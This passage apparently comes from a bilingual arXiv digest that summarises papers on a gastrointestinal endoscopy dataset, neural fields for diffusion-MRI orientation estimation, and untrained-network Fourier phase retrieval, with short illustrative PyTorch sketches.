dataset with extensive benchmarking based on the popular deep learning based baseline models. We believe our dataset can facilitate the development of AI-based algorithms for GI disease detection and classification. Our dataset is available at \url{https://osf.io/84e7f/}.
    摘要 将实时人工智能 (AI) 系统整合到临床实践中面临可扩展性和可接受性等挑战,包括数据可得性、结果偏差、数据质量、缺乏透明度,以及在来自不同分布的未见数据集上表现不佳。大规模、精确标注且多样化数据集的匮乏是临床整合的主要挑战,这也源于法律限制以及临床医生进行精确标注所需的大量人工工作。为应对这些挑战,我们提出了 GastroVision:一个多中心开放获取的胃肠 (GI) 内镜数据集,涵盖消化道的不同解剖标志、病理异常、息肉切除病例和正常所见(共 27 个类别)。该数据集包含来自挪威 Bærum 医院和瑞典 Karolinska 大学医院的 8,000 幅图像,由经验丰富的胃肠内镜医生标注并验证。此外,我们基于流行的深度学习基线模型进行了广泛的 benchmark,验证了数据集的价值。我们相信该数据集可以促进基于 AI 的胃肠疾病检测与分类算法的发展。数据集可在 \url{https://osf.io/84e7f/} 获取。

Neural Orientation Distribution Fields for Estimation and Uncertainty Quantification in Diffusion MRI

  • paper_url: http://arxiv.org/abs/2307.08138
  • repo_url: None
  • paper_authors: William Consagra, Lipeng Ning, Yogesh Rathi
  • for: 本文提出一种新的深度学习方法,用于从 diffusion MRI (dMRI) 信号中准确估计方向分布函数 (ODF) 并量化其不确定性。
  • methods: 该方法使用神经场 (neural field, NF) 来参数化潜在 ODF 场的随机级数表示,隐式地建模数据中常被忽略但很有价值的空间相关结构,从而在稀疏且含噪的情况下提高效率;并推导了后验预测分布的解析近似,用于量化任意空间位置上 ODF 估计的不确定性。
  • results: 在 synthetic 与真实 in-vivo 扩散数据上的实验表明,该方法优于现有方法。
    Abstract Inferring brain connectivity and structure \textit{in-vivo} requires accurate estimation of the orientation distribution function (ODF), which encodes key local tissue properties. However, estimating the ODF from diffusion MRI (dMRI) signals is a challenging inverse problem due to obstacles such as significant noise, high-dimensional parameter spaces, and sparse angular measurements. In this paper, we address these challenges by proposing a novel deep-learning based methodology for continuous estimation and uncertainty quantification of the spatially varying ODF field. We use a neural field (NF) to parameterize a random series representation of the latent ODFs, implicitly modeling the often ignored but valuable spatial correlation structures in the data, and thereby improving efficiency in sparse and noisy regimes. An analytic approximation to the posterior predictive distribution is derived which can be used to quantify the uncertainty in the ODF estimate at any spatial location, avoiding the need for expensive resampling-based approaches that are typically employed for this purpose. We present empirical evaluations on both synthetic and real in-vivo diffusion data, demonstrating the advantages of our method over existing approaches.
    摘要 在体推断大脑连接与结构需要准确估计方向分布函数 (ODF),该函数编码了关键的局部组织特性。然而,从弥散 MRI (dMRI) 信号中估计 ODF 是一个困难的逆问题,面临显著噪声、高维参数空间和稀疏角度测量等障碍。在本文中,我们提出一种基于深度学习的新方法,用于对空间变化的 ODF 场进行连续估计和不确定性量化,以应对这些挑战。我们使用神经场 (NF) 来参数化潜在 ODF 的随机级数表示,隐式地建模数据中常被忽略但很有价值的空间相关结构,从而在稀疏且含噪的情况下提高效率。我们推导了后验预测分布的解析近似,可用于量化任意空间位置上 ODF 估计的不确定性,避免了通常为此目的所采用的昂贵的重采样方法。我们在 synthetic 和真实 in-vivo 弥散数据上进行了实验评估,证明了该方法相对于现有方法的优势。
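
An illustrative sketch of the basic ingredient: a coordinate network that maps a spatial location to spherical-harmonic coefficients of the local ODF. The SH order and architecture are assumptions, and the paper's random-series formulation and posterior uncertainty machinery are intentionally omitted here:

```python
import torch
import torch.nn as nn

SH_ORDER = 8
N_COEF = (SH_ORDER + 1) * (SH_ORDER + 2) // 2      # 45 real, antipodally symmetric SH coefficients

odf_field = nn.Sequential(
    nn.Linear(3, 128), nn.ReLU(),
    nn.Linear(128, 128), nn.ReLU(),
    nn.Linear(128, N_COEF),                        # SH coefficients of the ODF at the queried voxel
)

coords = torch.rand(2048, 3)                       # normalized voxel locations
print(odf_field(coords).shape)                     # torch.Size([2048, 45])
```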

Untrained neural network embedded Fourier phase retrieval from few measurements

  • paper_url: http://arxiv.org/abs/2307.08717
  • repo_url: https://github.com/liyuan-2000/trad
  • paper_authors: Liyuan Ma, Hongxia Wang, Ningyi Leng, Ziyang Yuan
  • for: 这篇论文旨在解决少量测量下的傅里叶相位恢复 (Fourier phase retrieval, FPR) 问题,以降低时间和硬件成本。
  • methods: 该论文提出了一种基于 alternating direction method of multipliers (ADMM) 框架、嵌入未训练 (untrained) 神经网络的算法来求解 FPR,并引入 total variation (TV) 正则化以促进图像局部结构的恢复。
  • results: 实验结果表明,该算法以更少的计算资源优于现有的基于未训练神经网络的算法,甚至可与基于已训练神经网络的算法相竞争。
    Abstract Fourier phase retrieval (FPR) is a challenging task widely used in various applications. It involves recovering an unknown signal from its Fourier phaseless measurements. FPR with few measurements is important for reducing time and hardware costs, but it suffers from serious ill-posedness. Recently, untrained neural networks have offered new approaches by introducing learned priors to alleviate the ill-posedness without requiring any external data. However, they may not be ideal for reconstructing fine details in images and can be computationally expensive. This paper proposes an untrained neural network (NN) embedded algorithm based on the alternating direction method of multipliers (ADMM) framework to solve FPR with few measurements. Specifically, we use a generative network to represent the image to be recovered, which confines the image to the space defined by the network structure. To improve the ability to represent high-frequency information, total variation (TV) regularization is imposed to facilitate the recovery of local structures in the image. Furthermore, to reduce the computational cost mainly caused by the parameter updates of the untrained NN, we develop an accelerated algorithm that adaptively trades off between explicit and implicit regularization. Experimental results indicate that the proposed algorithm outperforms existing untrained NN-based algorithms with fewer computational resources and even performs competitively against trained NN-based algorithms.
    摘要 傅里叶相位恢复 (FPR) 是一项应用广泛而具有挑战性的任务,其目标是从无相位的傅里叶测量中恢复未知信号。少量测量下的 FPR 对降低时间和硬件成本十分重要,但存在严重的病态性。近来,未训练的神经网络通过引入学习到的先验来缓解病态性,且不需要任何外部数据,提供了新的思路。然而,它们可能难以重建图像中的精细细节,且计算代价较高。本文在 alternating direction method of multipliers (ADMM) 框架下提出一种嵌入未训练神经网络 (NN) 的算法,用于求解少量测量下的 FPR。具体而言,我们使用一个生成网络来表示待恢复的图像,将图像约束在该网络结构所定义的空间内。为提升对高频信息的表示能力,我们引入 total variation (TV) 正则化,以促进图像局部结构的恢复。此外,为降低主要由未训练 NN 参数更新造成的计算开销,我们开发了一种加速算法,可自适应地在显式正则化与隐式正则化之间进行权衡。实验结果表明,所提算法以更少的计算资源优于现有的基于未训练 NN 的算法,甚至可与基于已训练 NN 的算法相竞争。
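
A heavily simplified, runnable toy of the ingredients named above: an untrained generator acts as an implicit image prior, a total-variation term adds explicit regularization, and both are fitted to the phaseless Fourier magnitudes. Plain Adam steps replace the paper's ADMM splitting, so this is a didactic sketch rather than the proposed algorithm:

```python
import torch
import torch.nn as nn

torch.manual_seed(0)
n = 32
x_true = torch.rand(n, n)
y = torch.fft.fft2(x_true).abs()                   # phaseless Fourier measurements

z = torch.randn(1, 8, n, n)                        # fixed random input of the untrained generator
G = nn.Sequential(nn.Conv2d(8, 16, 3, padding=1), nn.ReLU(),
                  nn.Conv2d(16, 1, 3, padding=1), nn.Sigmoid())

def tv(img):                                       # anisotropic total variation (explicit regularizer)
    return (img[1:, :] - img[:-1, :]).abs().mean() + (img[:, 1:] - img[:, :-1]).abs().mean()

opt = torch.optim.Adam(G.parameters(), lr=1e-3)
for _ in range(200):
    opt.zero_grad()
    x = G(z)[0, 0]
    loss = ((torch.fft.fft2(x).abs() - y) ** 2).mean() + 0.05 * tv(x)
    loss.backward()
    opt.step()
print(f"final data-fit + TV objective: {loss.item():.4f}")
```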